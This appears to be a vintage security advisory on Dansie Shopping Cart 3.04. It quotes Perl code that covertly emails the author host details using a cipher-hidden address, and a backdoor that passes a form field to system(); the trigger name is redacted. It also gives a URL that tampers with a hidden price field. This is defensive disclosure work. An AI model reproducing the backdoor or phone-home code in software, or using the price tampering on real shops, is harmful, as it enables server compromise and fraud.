COMMAND
Danise Shopping Cart
SYSTEMS AFFECTED
Dansie Shopping Cart 3.04
PROBLEM
One of clients, while installing and configuring the Dansie
Shopping Cart, ran into difficulty integrating PGP, the shopping
cart program, and our secure server setup. While trying to
assist our client with the cart and PGP configuration we
discovered a couple of things. This was found by joe@blarg.net.
The CGI, under certain conditions, sends an email to the author
of the Dansie shopping cart software, 'tech@dansie.net'. This is
not readily apparent as the code that handles this transaction
incorporates a simple Caesar Cipher to hide the email address.
The cipher is handled via the subroutine 'there2':
sub there2
{
$_ = "$_[0]";
tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;
tr/_/-/;
tr/\@/\./;
return $_;
}
The call that creates this email address and sends the mail is the
function 'there3'.
sub there3
{
if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog"))
{
$a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8');
$b = &there2('8v59_3jhhzi8');
pop(@there2);
pop(@there2);
$c = &there2("@there2");
open (TECH, "|$mailprog $a");
print TECH "To: $a\n";
print TECH "From: $a\n";
print TECH "Subject: $b\n\n";
print TECH "$path3\n";
print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n";
print TECH "$c\n";
print TECH "$e $there\n" if ($e);
close (TECH);
}
}
The ciphered strings, when passed through 'there2', result in:
8v59 == tech
kte3cv == dansie
ev8 == net
8v59_3jhhzi8 == tech-support
$a == tech@dansie.net
$b == Subject: tech-support
This seems curious, but plausible reasons could include insuring
License compliance, or maybe the cart automatically sends this
email when an error occurs. The program definitely goes out of
its way to hide the fact that the mail is being sent.
While going through the rest of the code Joe discovered a much
more interesting item.
if ( ( ( $FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || ( ($FORM{'?????????'} ) && (!$d) ) )
{
if ( $ENV{'OS'} )
{
system("$FORM{'?????????'}");
}
else
{
open(ELIF,"|$FORM{'?????????'}");
}
exit;
}
The form element '?????????', which was originally a pseudo-random
appearing nine digit string of letters and numbers, allows an
intruder to execute any command on the server with the same
privileges as the CGI process itself. Although this is a full
disclosure list, the trigger element is obscured to prevent the
script kiddies from running away with this back door. If you own
the cart, then you have access to the source code and can
discover the element in question easily enough on your own.
Further searches through the code reveal that this form element
is immune to data validation - it gets passed into this code
fragment unchallenged.
The '$d' variable of the condition which permits the back door to
function is set elsewhere in the program to contain the string
'dansie'. (Again, using the ciphertext algorithm) This indicates
that the form element won't work on Dansie's own host, but will
work on anyone elses. There are additional problems with the
'there' function but we'll leave them as exercises for the reader
to decipher.
Dansie.net, armed with the server name and URL to the CGI
executable provided by the cloaked email routine, would be able
to run commands on any web server on the Internet that has the
Dansie Shopping Cart installed. It takes little imagination to
dream up the potential havoc and privacy violations this level of
access could result in; from stealing private customer records to
a full-blown crack of an E-Commerce server.
Kasey also discovered the back door and cloaked email routines.
Kasey also provides evidence in the post to indicate that not
only is Dansie well aware of the back door routine, but may be
actively attempting to utilize it. Based upon Joe's own
investigation, the information Kasey posted, and our own firewall
logs (see below), it is our opinion that the back door within
Dansie.net's shopping cart can best be summarized as follows:
1. The back door is very deliberate.
2. It isn't unique to the one copy we have access to here.
3. *Is being actively utilized by the author of the CGI.
* Based upon the log snippet in Kasey's post showing attempted
access to the CGI from an Earthlink dial-up IP. According to
Kasey, access to the CGI was attempted less than 30 minutes
after the cart was installed.
When noticed the attempted usage of Kasey's server, a quick check
of our own firewall logs revealed the following:
Packet log: input REJECT eth0 PROTO=6 209.179.141.xx:1054 x.x.x.x:80
{repeated several dozen times}
We can only assume these attempts, made from the same /24 on
Earthlink's dial-ups as the one used to probe Kasey's server,
were from the author of the shopping cart.
If installing a backdoor in the cart software wasn't bad enough..
the whole implimentation of pricing and adding items to cart is
crap.. Example form to add items to your cart (kindly provided
on the publishers site using the demo cart they set up for us):
*snip*
<FORM METHOD=POST ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl">
Black Leather purse with leather straps<BR>
Price: $20.00<BR>
<INPUT TYPE=HIDDEN NAME=name VALUE="Black leather purse">
<INPUT TYPE=HIDDEN NAME=price VALUE="20.00">
<INPUT TYPE=HIDDEN NAME=sh VALUE="1"> <!-- Shipping and Handling
-->
<INPUT TYPE=HIDDEN NAME=img VALUE="purse.jpg">
<INPUT TYPE=HIDDEN NAME=return VALUE="http://www.dansie.net/demo.html">
<INPUT TYPE=HIDDEN NAME=custom1 VALUE="Black leather purse with leather straps">
<INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart">
</FORM>
*snip*
A couple of quick alterations and we can now add:
http://www.dansie.net/cgi-bin/scripts/cart.pl?name=piece+of+crap+cart+software&price=1.00&sh=1&img=purse.jpg&return=http://www.dansie.net/demo.html&custom1=my+shopping+cart+software+sucks+because+i+let+users+manipulate+crucial+variables
SOLUTION
The Dansie Shopping Cart bug has been removed--it should no longer
either email him anti-piracy information nor allow any
surreptitious access. Craig is shipping the patch in his next
update to all his customers; due to the nature of his script, all
customers need to update on a regular basis to remain functional.